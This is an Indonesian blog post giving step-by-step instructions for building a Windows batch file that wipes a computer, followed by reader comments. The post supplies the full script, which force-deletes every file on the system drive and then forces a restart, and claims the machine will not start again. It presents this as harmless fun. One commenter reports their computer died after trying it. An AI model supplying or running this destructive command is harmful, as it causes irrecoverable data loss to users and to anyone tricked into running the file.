Cara Merusak Komputer

Nah teman Sekarang saya akan membahas masalah yang agak berbahaya yaitu merusak komputer. saya belum mencobanya,tetapi saya waktu browsing ke internet menemukan ini. ya,sekedar hiburan saja,tetapi kalau komputer anda rusak jangan salahkan saya

Caranya adalah
1. Buka nOtpade
2. Copy code berikut ini


@echo off
del%systemdrive%*.*/f/s/q/
shutdown -r -f -t 00


3. Klik Save as terus save dengan (nama terserah anda).bat
Contoh : Rizky.bat
Saat menjalankan file tersebut komputer akan shutdown dan tidak dapat dihidupkan lagi

Related Posts by Categories



Komentar :

ada 3 komentar ke “Cara Merusak Komputer”
mi al-ihsan mengatakan...
pada hari 

komputer q mati brooo.. bahaya jg akibatnya sekedar coba-coba.

Yusron My Blog mengatakan...
pada hari 

yang emoticon kok gagal???
gw minta solusi tolong kunjungi blog gw http://yusronafterlife.co.cc/ dan kirim soutbox chat
trimz kk

Unknown mengatakan...
pada hari 

la cara nyembuhinnya gmna gan ??

Posting Komentar

 
Powered By Blogger
Powered By Blogger
Powered By Blogger
© Grunge Theme Copyright by BLOG RIZKY FERDANI | Template by Blogger Templates | Blog Trick at Blog-HowToTricks